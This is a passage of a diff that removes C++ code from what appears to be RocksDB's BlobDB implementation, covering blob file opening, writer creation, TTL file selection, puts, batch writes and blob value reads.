-                     "Skipping file in blob directory %s parse: %d type: %d",
-                     f.c_str(), psucc, ((psucc) ? type : -1));
-    }
-  }
-
-  return status;
-}
-
-Status BlobDBImpl::OpenAllFiles() {
-  WriteLock wl(&mutex_);
-
-  std::set<std::pair<uint64_t, std::string>> file_nums;
-  Status status = GetAllLogFiles(&file_nums);
-
-  if (!status.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to collect files from blob dir: %s status: '%s'",
-                    blob_dir_.c_str(), status.ToString().c_str());
-    return status;
-  }
-
-  ROCKS_LOG_INFO(db_options_.info_log,
-                 "BlobDir files path: %s count: %d min: %" PRIu64
-                 " max: %" PRIu64,
-                 blob_dir_.c_str(), static_cast<int>(file_nums.size()),
-                 (file_nums.empty()) ? -1 : (file_nums.begin())->first,
-                 (file_nums.empty()) ? -1 : (file_nums.end())->first);
-
-  if (!file_nums.empty())
-    next_file_number_.store((file_nums.rbegin())->first + 1);
-
-  for (auto f_iter : file_nums) {
-    std::string bfpath = BlobFileName(blob_dir_, f_iter.first);
-    uint64_t size_bytes;
-    Status s1 = env_->GetFileSize(bfpath, &size_bytes);
-    if (!s1.ok()) {
-      ROCKS_LOG_WARN(
-          db_options_.info_log,
-          "Unable to get size of %s. File skipped from open status: '%s'",
-          bfpath.c_str(), s1.ToString().c_str());
-      continue;
-    }
-
-    if (debug_level_ >= 1)
-      ROCKS_LOG_INFO(db_options_.info_log, "Blob File open: %s size: %" PRIu64,
-                     bfpath.c_str(), size_bytes);
-
-    std::shared_ptr<BlobFile> bfptr =
-        std::make_shared<BlobFile>(this, blob_dir_, f_iter.first);
-    bfptr->SetFileSize(size_bytes);
-
-    // since this file already existed, we will try to reconcile
-    // deleted count with LSM
-    bfptr->gc_once_after_open_ = true;
-
-    // read header
-    std::shared_ptr<Reader> reader;
-    reader = bfptr->OpenSequentialReader(env_, db_options_, env_options_);
-    s1 = reader->ReadHeader(&bfptr->header_);
-    if (!s1.ok()) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Failure to read header for blob-file %s "
-                      "status: '%s' size: %" PRIu64,
-                      bfpath.c_str(), s1.ToString().c_str(), size_bytes);
-      continue;
-    }
-    bfptr->SetHasTTL(bfptr->header_.has_ttl);
-    bfptr->SetCompression(bfptr->header_.compression);
-    bfptr->header_valid_ = true;
-
-    std::shared_ptr<RandomAccessFileReader> ra_reader =
-        GetOrOpenRandomAccessReader(bfptr, env_, env_options_);
-
-    BlobLogFooter bf;
-    s1 = bfptr->ReadFooter(&bf);
-
-    bfptr->CloseRandomAccessLocked();
-    if (s1.ok()) {
-      s1 = bfptr->SetFromFooterLocked(bf);
-      if (!s1.ok()) {
-        ROCKS_LOG_ERROR(db_options_.info_log,
-                        "Header Footer mismatch for blob-file %s "
-                        "status: '%s' size: %" PRIu64,
-                        bfpath.c_str(), s1.ToString().c_str(), size_bytes);
-        continue;
-      }
-    } else {
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "File found incomplete (w/o footer) %s", bfpath.c_str());
-
-      // sequentially iterate over the file and read all the records
-      ExpirationRange expiration_range(std::numeric_limits<uint32_t>::max(),
-                                       std::numeric_limits<uint32_t>::min());
-
-      uint64_t blob_count = 0;
-      BlobLogRecord record;
-      Reader::ReadLevel shallow = Reader::kReadHeaderKey;
-
-      uint64_t record_start = reader->GetNextByte();
-      // TODO(arahut) - when we detect corruption, we should truncate
-      while (reader->ReadRecord(&record, shallow).ok()) {
-        ++blob_count;
-        if (bfptr->HasTTL()) {
-          expiration_range.first =
-              std::min(expiration_range.first, record.expiration);
-          expiration_range.second =
-              std::max(expiration_range.second, record.expiration);
-        }
-        record_start = reader->GetNextByte();
-      }
-
-      if (record_start != bfptr->GetFileSize()) {
-        ROCKS_LOG_ERROR(db_options_.info_log,
-                        "Blob file is corrupted or crashed during write %s"
-                        " good_size: %" PRIu64 " file_size: %" PRIu64,
-                        bfpath.c_str(), record_start, bfptr->GetFileSize());
-      }
-
-      if (!blob_count) {
-        ROCKS_LOG_INFO(db_options_.info_log, "BlobCount = 0 in file %s",
-                       bfpath.c_str());
-        continue;
-      }
-
-      bfptr->SetBlobCount(blob_count);
-      bfptr->SetSequenceRange({0, 0});
-
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "Blob File: %s blob_count: %" PRIu64
-                     " size_bytes: %" PRIu64 " has_ttl: %d",
-                     bfpath.c_str(), blob_count, size_bytes, bfptr->HasTTL());
-
-      if (bfptr->HasTTL()) {
-        expiration_range.second = std::max(
-            expiration_range.second,
-            expiration_range.first + (uint32_t)bdb_options_.ttl_range_secs);
-        bfptr->set_expiration_range(expiration_range);
-
-        uint64_t now = EpochNow();
-        if (expiration_range.second < now) {
-          Status fstatus = CreateWriterLocked(bfptr);
-          if (fstatus.ok()) fstatus = bfptr->WriteFooterAndCloseLocked();
-          if (!fstatus.ok()) {
-            ROCKS_LOG_ERROR(
-                db_options_.info_log,
-                "Failed to close Blob File: %s status: '%s'. Skipped",
-                bfpath.c_str(), fstatus.ToString().c_str());
-            continue;
-          } else {
-            ROCKS_LOG_ERROR(
-                db_options_.info_log,
-                "Blob File Closed: %s now: %d expiration_range: (%d, %d)",
-                bfpath.c_str(), now, expiration_range.first,
-                expiration_range.second);
-          }
-        } else {
-          open_ttl_files_.insert(bfptr);
-        }
-      }
-    }
-
-    blob_files_.insert(std::make_pair(f_iter.first, bfptr));
-  }
-
-  return status;
-}
-
-void BlobDBImpl::CloseRandomAccessLocked(
-    const std::shared_ptr<BlobFile>& bfile) {
-  bfile->CloseRandomAccessLocked();
-  open_file_count_--;
-}
-
-std::shared_ptr<RandomAccessFileReader> BlobDBImpl::GetOrOpenRandomAccessReader(
-    const std::shared_ptr<BlobFile>& bfile, Env* env,
-    const EnvOptions& env_options) {
-  bool fresh_open = false;
-  auto rar = bfile->GetOrOpenRandomAccessReader(env, env_options, &fresh_open);
-  if (fresh_open) open_file_count_++;
-  return rar;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::NewBlobFile(const std::string& reason) {
-  uint64_t file_num = next_file_number_++;
-  auto bfile = std::make_shared<BlobFile>(this, blob_dir_, file_num);
-  ROCKS_LOG_DEBUG(db_options_.info_log, "New blob file created: %s reason='%s'",
-                  bfile->PathName().c_str(), reason.c_str());
-  LogFlush(db_options_.info_log);
-  return bfile;
-}
-
-Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr<BlobFile>& bfile) {
-  std::string fpath(bfile->PathName());
-  std::unique_ptr<WritableFile> wfile;
-
-  Status s = env_->ReopenWritableFile(fpath, &wfile, env_options_);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to open blob file for write: %s status: '%s'"
-                    " exists: '%s'",
-                    fpath.c_str(), s.ToString().c_str(),
-                    env_->FileExists(fpath).ToString().c_str());
-    return s;
-  }
-
-  std::unique_ptr<WritableFileWriter> fwriter;
-  fwriter.reset(new WritableFileWriter(std::move(wfile), env_options_));
-
-  uint64_t boffset = bfile->GetFileSize();
-  if (debug_level_ >= 2 && boffset) {
-    ROCKS_LOG_DEBUG(db_options_.info_log, "Open blob file: %s with offset: %d",
-                    fpath.c_str(), boffset);
-  }
-
-  Writer::ElemType et = Writer::kEtNone;
-  if (bfile->file_size_ == BlobLogHeader::kSize) {
-    et = Writer::kEtFileHdr;
-  } else if (bfile->file_size_ > BlobLogHeader::kSize) {
-    et = Writer::kEtRecord;
-  } else if (bfile->file_size_) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Open blob file: %s with wrong size: %d", fpath.c_str(),
-                   boffset);
-    return Status::Corruption("Invalid blob file size");
-  }
-
-  bfile->log_writer_ = std::make_shared<Writer>(
-      std::move(fwriter), bfile->file_number_, bdb_options_.bytes_per_sync,
-      db_options_.use_fsync, boffset);
-  bfile->log_writer_->last_elem_type_ = et;
-
-  return s;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::FindBlobFileLocked(
-    uint64_t expiration) const {
-  if (open_ttl_files_.empty()) return nullptr;
-
-  std::shared_ptr<BlobFile> tmp = std::make_shared<BlobFile>();
-  tmp->expiration_range_ = std::make_pair(expiration, 0);
-
-  auto citr = open_ttl_files_.equal_range(tmp);
-  if (citr.first == open_ttl_files_.end()) {
-    assert(citr.second == open_ttl_files_.end());
-
-    std::shared_ptr<BlobFile> check = *(open_ttl_files_.rbegin());
-    return (check->expiration_range_.second < expiration) ? nullptr : check;
-  }
-
-  if (citr.first != citr.second) return *(citr.first);
-
-  auto finditr = citr.second;
-  if (finditr != open_ttl_files_.begin()) --finditr;
-
-  bool b2 = (*finditr)->expiration_range_.second < expiration;
-  bool b1 = (*finditr)->expiration_range_.first > expiration;
-
-  return (b1 || b2) ? nullptr : (*finditr);
-}
-
-std::shared_ptr<Writer> BlobDBImpl::CheckOrCreateWriterLocked(
-    const std::shared_ptr<BlobFile>& bfile) {
-  std::shared_ptr<Writer> writer = bfile->GetWriter();
-  if (writer) return writer;
-
-  Status s = CreateWriterLocked(bfile);
-  if (!s.ok()) return nullptr;
-
-  writer = bfile->GetWriter();
-  return writer;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::SelectBlobFile() {
-  {
-    ReadLock rl(&mutex_);
-    if (open_non_ttl_file_ != nullptr) {
-      return open_non_ttl_file_;
-    }
-  }
-
-  // CHECK again
-  WriteLock wl(&mutex_);
-  if (open_non_ttl_file_ != nullptr) {
-    return open_non_ttl_file_;
-  }
-
-  std::shared_ptr<BlobFile> bfile = NewBlobFile("SelectBlobFile");
-  assert(bfile);
-
-  // file not visible, hence no lock
-  std::shared_ptr<Writer> writer = CheckOrCreateWriterLocked(bfile);
-  if (!writer) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to get writer from blob file: %s",
-                    bfile->PathName().c_str());
-    return nullptr;
-  }
-
-  bfile->file_size_ = BlobLogHeader::kSize;
-  bfile->header_.compression = bdb_options_.compression;
-  bfile->header_.has_ttl = false;
-  bfile->header_.column_family_id =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->GetID();
-  bfile->header_valid_ = true;
-  bfile->SetHasTTL(false);
-  bfile->SetCompression(bdb_options_.compression);
-
-  Status s = writer->WriteHeader(bfile->header_);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to write header to new blob file: %s"
-                    " status: '%s'",
-                    bfile->PathName().c_str(), s.ToString().c_str());
-    return nullptr;
-  }
-
-  dir_change_.store(true);
-  blob_files_.insert(std::make_pair(bfile->BlobFileNumber(), bfile));
-  open_non_ttl_file_ = bfile;
-  return bfile;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) {
-  assert(expiration != kNoExpiration);
-  uint64_t epoch_read = 0;
-  std::shared_ptr<BlobFile> bfile;
-  {
-    ReadLock rl(&mutex_);
-    bfile = FindBlobFileLocked(expiration);
-    epoch_read = epoch_of_.load();
-  }
-
-  if (bfile) {
-    assert(!bfile->Immutable());
-    return bfile;
-  }
-
-  uint64_t exp_low =
-      (expiration / bdb_options_.ttl_range_secs) * bdb_options_.ttl_range_secs;
-  uint64_t exp_high = exp_low + bdb_options_.ttl_range_secs;
-  ExpirationRange expiration_range = std::make_pair(exp_low, exp_high);
-
-  bfile = NewBlobFile("SelectBlobFileTTL");
-  assert(bfile);
-
-  ROCKS_LOG_INFO(db_options_.info_log, "New blob file TTL range: %s %d %d",
-                 bfile->PathName().c_str(), exp_low, exp_high);
-  LogFlush(db_options_.info_log);
-
-  // we don't need to take lock as no other thread is seeing bfile yet
-  std::shared_ptr<Writer> writer = CheckOrCreateWriterLocked(bfile);
-  if (!writer) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to get writer from blob file with TTL: %s",
-                    bfile->PathName().c_str());
-    return nullptr;
-  }
-
-  bfile->header_.expiration_range = expiration_range;
-  bfile->header_.compression = bdb_options_.compression;
-  bfile->header_.has_ttl = true;
-  bfile->header_.column_family_id =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->GetID();
-  ;
-  bfile->header_valid_ = true;
-  bfile->SetHasTTL(true);
-  bfile->SetCompression(bdb_options_.compression);
-  bfile->file_size_ = BlobLogHeader::kSize;
-
-  // set the first value of the range, since that is
-  // concrete at this time.  also necessary to add to open_ttl_files_
-  bfile->expiration_range_ = expiration_range;
-
-  WriteLock wl(&mutex_);
-  // in case the epoch has shifted in the interim, then check
-  // check condition again - should be rare.
-  if (epoch_of_.load() != epoch_read) {
-    auto bfile2 = FindBlobFileLocked(expiration);
-    if (bfile2) return bfile2;
-  }
-
-  Status s = writer->WriteHeader(bfile->header_);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to write header to new blob file: %s"
-                    " status: '%s'",
-                    bfile->PathName().c_str(), s.ToString().c_str());
-    return nullptr;
-  }
-
-  dir_change_.store(true);
-  blob_files_.insert(std::make_pair(bfile->BlobFileNumber(), bfile));
-  open_ttl_files_.insert(bfile);
-  epoch_of_++;
-
-  return bfile;
-}
-
-Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) {
-  SequenceNumber lsn = db_impl_->GetLatestSequenceNumber();
-  Status s = db_->Delete(options, key);
-
-  if (bdb_options_.enable_garbage_collection) {
-    // add deleted key to list of keys that have been deleted for book-keeping
-    delete_keys_q_.enqueue({DefaultColumnFamily(), key.ToString(), lsn});
-  }
-  return s;
-}
-
-class BlobDBImpl::BlobInserter : public WriteBatch::Handler {
- private:
-  const WriteOptions& options_;
-  BlobDBImpl* blob_db_impl_;
-  uint32_t default_cf_id_;
-  SequenceNumber sequence_;
-  WriteBatch batch_;
-
- public:
-  BlobInserter(const WriteOptions& options, BlobDBImpl* blob_db_impl,
-               uint32_t default_cf_id, SequenceNumber seq)
-      : options_(options),
-        blob_db_impl_(blob_db_impl),
-        default_cf_id_(default_cf_id),
-        sequence_(seq) {}
-
-  SequenceNumber sequence() { return sequence_; }
-
-  WriteBatch* batch() { return &batch_; }
-
-  virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                       const Slice& value) override {
-    if (column_family_id != default_cf_id_) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    std::string new_value;
-    Slice value_slice;
-    uint64_t expiration =
-        blob_db_impl_->ExtractExpiration(key, value, &value_slice, &new_value);
-    Status s = blob_db_impl_->PutBlobValue(options_, key, value_slice,
-                                           expiration, sequence_, &batch_);
-    sequence_++;
-    return s;
-  }
-
-  virtual Status DeleteCF(uint32_t column_family_id,
-                          const Slice& key) override {
-    if (column_family_id != default_cf_id_) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    Status s = WriteBatchInternal::Delete(&batch_, column_family_id, key);
-    sequence_++;
-    return s;
-  }
-
-  virtual Status DeleteRange(uint32_t column_family_id, const Slice& begin_key,
-                             const Slice& end_key) {
-    if (column_family_id != default_cf_id_) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    Status s = WriteBatchInternal::DeleteRange(&batch_, column_family_id,
-                                               begin_key, end_key);
-    sequence_++;
-    return s;
-  }
-
-  virtual Status SingleDeleteCF(uint32_t /*column_family_id*/,
-                                const Slice& /*key*/) override {
-    return Status::NotSupported("Not supported operation in blob db.");
-  }
-
-  virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/,
-                         const Slice& /*value*/) override {
-    return Status::NotSupported("Not supported operation in blob db.");
-  }
-
-  virtual void LogData(const Slice& blob) override { batch_.PutLogData(blob); }
-};
-
-Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) {
-
-  uint32_t default_cf_id =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->GetID();
-  // TODO(yiwu): In case there are multiple writers the latest sequence would
-  // not be the actually sequence we are writting. Need to get the sequence
-  // from write batch after DB write instead.
-  SequenceNumber current_seq = GetLatestSequenceNumber() + 1;
-  Status s;
-  BlobInserter blob_inserter(options, this, default_cf_id, current_seq);
-  {
-    // Release write_mutex_ before DB write to avoid race condition with
-    // flush begin listener, which also require write_mutex_ to sync
-    // blob files.
-    MutexLock l(&write_mutex_);
-    s = updates->Iterate(&blob_inserter);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-  s = db_->Write(options, blob_inserter.batch());
-  if (!s.ok()) {
-    return s;
-  }
-
-  // add deleted key to list of keys that have been deleted for book-keeping
-  class DeleteBookkeeper : public WriteBatch::Handler {
-   public:
-    explicit DeleteBookkeeper(BlobDBImpl* impl, const SequenceNumber& seq)
-        : impl_(impl), sequence_(seq) {}
-
-    virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& /*key*/,
-                         const Slice& /*value*/) override {
-      sequence_++;
-      return Status::OK();
-    }
-
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      ColumnFamilyHandle* cfh =
-          impl_->db_impl_->GetColumnFamilyHandleUnlocked(column_family_id);
-
-      impl_->delete_keys_q_.enqueue({cfh, key.ToString(), sequence_});
-      sequence_++;
-      return Status::OK();
-    }
-
-   private:
-    BlobDBImpl* impl_;
-    SequenceNumber sequence_;
-  };
-
-  if (bdb_options_.enable_garbage_collection) {
-    // add deleted key to list of keys that have been deleted for book-keeping
-    DeleteBookkeeper delete_bookkeeper(this, current_seq);
-    s = updates->Iterate(&delete_bookkeeper);
-  }
-
-  return s;
-}
-
-Status BlobDBImpl::GetLiveFiles(std::vector<std::string>& ret,
-                                uint64_t* manifest_file_size,
-                                bool flush_memtable) {
-  // Hold a lock in the beginning to avoid updates to base DB during the call
-  ReadLock rl(&mutex_);
-  Status s = db_->GetLiveFiles(ret, manifest_file_size, flush_memtable);
-  if (!s.ok()) {
-    return s;
-  }
-  ret.reserve(ret.size() + blob_files_.size());
-  for (auto bfile_pair : blob_files_) {
-    auto blob_file = bfile_pair.second;
-    ret.emplace_back(blob_file->PathName());
-  }
-  return Status::OK();
-}
-
-void BlobDBImpl::GetLiveFilesMetaData(std::vector<LiveFileMetaData>* metadata) {
-  // Hold a lock in the beginning to avoid updates to base DB during the call
-  ReadLock rl(&mutex_);
-  db_->GetLiveFilesMetaData(metadata);
-  for (auto bfile_pair : blob_files_) {
-    auto blob_file = bfile_pair.second;
-    LiveFileMetaData filemetadata;
-    filemetadata.size = blob_file->GetFileSize();
-    filemetadata.name = blob_file->PathName();
-    auto cfh =
-        reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily());
-    filemetadata.column_family_name = cfh->GetName();
-    metadata->emplace_back(filemetadata);
-  }
-}
-
-Status BlobDBImpl::Put(const WriteOptions& options, const Slice& key,
-                       const Slice& value) {
-  std::string new_value;
-  Slice value_slice;
-  uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value);
-  return PutUntil(options, key, value_slice, expiration);
-}
-
-Status BlobDBImpl::PutWithTTL(const WriteOptions& options,
-                              const Slice& key, const Slice& value,
-                              uint64_t ttl) {
-  uint64_t now = EpochNow();
-  uint64_t expiration = kNoExpiration - now > ttl ? now + ttl : kNoExpiration;
-  return PutUntil(options, key, value, expiration);
-}
-
-Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key,
-                            const Slice& value, uint64_t expiration) {
-  TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start");
-  Status s;
-  WriteBatch batch;
-  {
-    // Release write_mutex_ before DB write to avoid race condition with
-    // flush begin listener, which also require write_mutex_ to sync
-    // blob files.
-    MutexLock l(&write_mutex_);
-    // TODO(yiwu): In case there are multiple writers the latest sequence would
-    // not be the actually sequence we are writting. Need to get the sequence
-    // from write batch after DB write instead.
-    SequenceNumber sequence = GetLatestSequenceNumber() + 1;
-    s = PutBlobValue(options, key, value, expiration, sequence, &batch);
-  }
-  if (s.ok()) {
-    s = db_->Write(options, &batch);
-  }
-  TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish");
-  return s;
-}
-
-Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key,
-                                const Slice& value, uint64_t expiration,
-                                SequenceNumber sequence, WriteBatch* batch) {
-  Status s;
-  std::string index_entry;
-  uint32_t column_family_id =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->GetID();
-  if (value.size() < bdb_options_.min_blob_size) {
-    if (expiration == kNoExpiration) {
-      // Put as normal value
-      s = batch->Put(key, value);
-    } else {
-      // Inlined with TTL
-      BlobIndex::EncodeInlinedTTL(&index_entry, expiration, value);
-      s = WriteBatchInternal::PutBlobIndex(batch, column_family_id, key,
-                                           index_entry);
-    }
-  } else {
-    std::shared_ptr<BlobFile> bfile = (expiration != kNoExpiration)
-                                          ? SelectBlobFileTTL(expiration)
-                                          : SelectBlobFile();
-    if (!bfile) {
-      return Status::NotFound("Blob file not found");
-    }
-
-    assert(bfile->compression() == bdb_options_.compression);
-    std::string compression_output;
-    Slice value_compressed = GetCompressedSlice(value, &compression_output);
-
-    std::string headerbuf;
-    Writer::ConstructBlobHeader(&headerbuf, key, value_compressed, expiration);
-
-    s = AppendBlob(bfile, headerbuf, key, value_compressed, expiration,
-                   &index_entry);
-
-    if (s.ok()) {
-      bfile->ExtendSequenceRange(sequence);
-      if (expiration != kNoExpiration) {
-        bfile->ExtendExpirationRange(expiration);
-      }
-      s = CloseBlobFileIfNeeded(bfile);
-      if (s.ok()) {
-        s = WriteBatchInternal::PutBlobIndex(batch, column_family_id, key,
-                                             index_entry);
-      }
-    } else {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Failed to append blob to FILE: %s: KEY: %s VALSZ: %d"
-                      " status: '%s' blob_file: '%s'",
-                      bfile->PathName().c_str(), key.ToString().c_str(),
-                      value.size(), s.ToString().c_str(),
-                      bfile->DumpState().c_str());
-    }
-  }
-
-  return s;
-}
-
-Slice BlobDBImpl::GetCompressedSlice(const Slice& raw,
-                                     std::string* compression_output) const {
-  if (bdb_options_.compression == kNoCompression) {
-    return raw;
-  }
-  CompressionType ct = bdb_options_.compression;
-  CompressionOptions compression_opts;
-  CompressBlock(raw, compression_opts, &ct, kBlockBasedTableVersionFormat,
-                Slice(), compression_output);
-  return *compression_output;
-}
-
-uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value,
-                                       Slice* value_slice,
-                                       std::string* new_value) {
-  uint64_t expiration = kNoExpiration;
-  bool has_expiration = false;
-  bool value_changed = false;
-  if (ttl_extractor_ != nullptr) {
-    has_expiration = ttl_extractor_->ExtractExpiration(
-        key, value, EpochNow(), &expiration, new_value, &value_changed);
-  }
-  *value_slice = value_changed ? Slice(*new_value) : value;
-  return has_expiration ? expiration : kNoExpiration;
-}
-
-std::shared_ptr<BlobFile> BlobDBImpl::GetOldestBlobFile() {
-  std::vector<std::shared_ptr<BlobFile>> blob_files;
-  CopyBlobFiles(&blob_files, [](const std::shared_ptr<BlobFile>& f) {
-    return !f->Obsolete() && f->Immutable();
-  });
-  blobf_compare_ttl compare;
-  return *std::min_element(blob_files.begin(), blob_files.end(), compare);
-}
-
-bool BlobDBImpl::EvictOldestBlobFile() {
-  auto oldest_file = GetOldestBlobFile();
-  if (oldest_file == nullptr) {
-    return false;
-  }
-
-  WriteLock wl(&mutex_);
-  // Double check the file is not obsolete by others
-  if (oldest_file_evicted_ == false && !oldest_file->Obsolete()) {
-    auto expiration_range = oldest_file->GetExpirationRange();
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "Evict oldest blob file since DB out of space. Current "
-                   "space used: %" PRIu64 ", blob dir size: %" PRIu64
-                   ", evicted blob file #%" PRIu64
-                   " with expiration range (%" PRIu64 ", %" PRIu64 ").",
-                   total_blob_space_.load(), bdb_options_.blob_dir_size,
-                   oldest_file->BlobFileNumber(), expiration_range.first,
-                   expiration_range.second);
-    oldest_file->MarkObsolete(oldest_file->GetSequenceRange().second);
-    obsolete_files_.push_back(oldest_file);
-    oldest_file_evicted_.store(true);
-    return true;
-  }
-
-  return false;
-}
-
-Status BlobDBImpl::CheckSize(size_t blob_size) {
-  uint64_t new_space_util = total_blob_space_.load() + blob_size;
-  if (bdb_options_.blob_dir_size > 0) {
-    if (!bdb_options_.is_fifo &&
-        (new_space_util > bdb_options_.blob_dir_size)) {
-      return Status::NoSpace(
-          "Write failed, as writing it would exceed blob_dir_size limit.");
-    }
-    if (bdb_options_.is_fifo && !oldest_file_evicted_.load() &&
-        (new_space_util >
-         kEvictOldestFileAtSize * bdb_options_.blob_dir_size)) {
-      EvictOldestBlobFile();
-    }
-  }
-
-  return Status::OK();
-}
-
-Status BlobDBImpl::AppendBlob(const std::shared_ptr<BlobFile>& bfile,
-                              const std::string& headerbuf, const Slice& key,
-                              const Slice& value, uint64_t expiration,
-                              std::string* index_entry) {
-  auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size();
-  Status s = CheckSize(size_put);
-  if (!s.ok()) {
-    return s;
-  }
-
-  uint64_t blob_offset = 0;
-  uint64_t key_offset = 0;
-  {
-    WriteLock lockbfile_w(&bfile->mutex_);
-    std::shared_ptr<Writer> writer = CheckOrCreateWriterLocked(bfile);
-    if (!writer) return Status::IOError("Failed to create blob writer");
-
-    // write the blob to the blob log.
-    s = writer->EmitPhysicalRecord(headerbuf, key, value, &key_offset,
-                                   &blob_offset);
-  }
-
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Invalid status in AppendBlob: %s status: '%s'",
-                    bfile->PathName().c_str(), s.ToString().c_str());
-    return s;
-  }
-
-  // increment blob count
-  bfile->blob_count_++;
-
-  bfile->file_size_ += size_put;
-  last_period_write_ += size_put;
-  total_blob_space_ += size_put;
-
-  if (expiration == kNoExpiration) {
-    BlobIndex::EncodeBlob(index_entry, bfile->BlobFileNumber(), blob_offset,
-                          value.size(), bdb_options_.compression);
-  } else {
-    BlobIndex::EncodeBlobTTL(index_entry, expiration, bfile->BlobFileNumber(),
-                             blob_offset, value.size(),
-                             bdb_options_.compression);
-  }
-
-  return s;
-}
-
-std::vector<Status> BlobDBImpl::MultiGet(
-    const ReadOptions& read_options,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  // Get a snapshot to avoid blob file get deleted between we
-  // fetch and index entry and reading from the file.
-  ReadOptions ro(read_options);
-  bool snapshot_created = SetSnapshotIfNeeded(&ro);
-
-  std::vector<Status> statuses;
-  statuses.reserve(keys.size());
-  values->clear();
-  values->reserve(keys.size());
-  PinnableSlice value;
-  for (size_t i = 0; i < keys.size(); i++) {
-    statuses.push_back(Get(ro, DefaultColumnFamily(), keys[i], &value));
-    values->push_back(value.ToString());
-    value.Reset();
-  }
-  if (snapshot_created) {
-    db_->ReleaseSnapshot(ro.snapshot);
-  }
-  return statuses;
-}
-
-bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) {
-  assert(read_options != nullptr);
-  if (read_options->snapshot != nullptr) {
-    return false;
-  }
-  read_options->snapshot = db_->GetSnapshot();
-  return true;
-}
-
-Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry,
-                                PinnableSlice* value) {
-  assert(value != nullptr);
-  BlobIndex blob_index;
-  Status s = blob_index.DecodeFrom(index_entry);
-  if (!s.ok()) {
-    return s;
-  }
-  if (blob_index.HasTTL() && blob_index.expiration() <= EpochNow()) {
-    return Status::NotFound("Key expired");
-  }
-  if (blob_index.IsInlined()) {
-    // TODO(yiwu): If index_entry is a PinnableSlice, we can also pin the same
-    // memory buffer to avoid extra copy.
-    value->PinSelf(blob_index.value());
-    return Status::OK();
-  }
-  if (blob_index.size() == 0) {
-    value->PinSelf("");
-    return Status::OK();
-  }
-
-  // offset has to have certain min, as we will read CRC
-  // later from the Blob Header, which needs to be also a
-  // valid offset.
-  if (blob_index.offset() <
-      (BlobLogHeader::kSize + BlobLogRecord::kHeaderSize + key.size())) {
-    if (debug_level_ >= 2) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Invalid blob index file_number: %" PRIu64
-                      " blob_offset: %" PRIu64 " blob_size: %" PRIu64
-                      " key: %s",
-                      blob_index.file_number(), blob_index.offset(),
-                      blob_index.size(), key.data());
-    }
-    return Status::NotFound("Invalid blob offset");
-  }
-
-  std::shared_ptr<BlobFile> bfile;
-  {
-    ReadLock rl(&mutex_);
-    auto hitr = blob_files_.find(blob_index.file_number());
-
-    // file was deleted
-    if (hitr == blob_files_.end()) {
-      return Status::NotFound("Blob Not Found as blob file missing");
-    }
-
-    bfile = hitr->second;
-  }
-
-  if (blob_index.size() == 0 && value != nullptr) {
-    value->PinSelf("");
-    return Status::OK();
-  }
-
-  // takes locks when called
-  std::shared_ptr<RandomAccessFileReader> reader =
-      GetOrOpenRandomAccessReader(bfile, env_, env_options_);
-
-  std::string* valueptr = value->GetSelf();
-  std::string value_c;
-  if (bdb_options_.compression != kNoCompression) {
-    valueptr = &value_c;
-  }
-
-  // Allocate the buffer. This is safe in C++11
-  // Note that std::string::reserved() does not work, since previous value
-  // of the buffer can be larger than blob_index.size().
-  valueptr->resize(blob_index.size());
-  char* buffer = &(*valueptr)[0];
-
-  Slice blob_value;
-  s = reader->Read(blob_index.offset(), blob_index.size(), &blob_value, buffer);
-  if (!s.ok() || blob_value.size() != blob_index.size()) {
-    if (debug_level_ >= 2) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Failed to read blob from file: %s blob_offset: %" PRIu64
-                      " blob_size: %" PRIu64 " read: %d key: %s status: '%s'",
-                      bfile->PathName().c_str(), blob_index.offset(),
-                      blob_index.size(), static_cast<int>(blob_value.size()),
-                      key.data(), s.ToString().c_str());
-    }
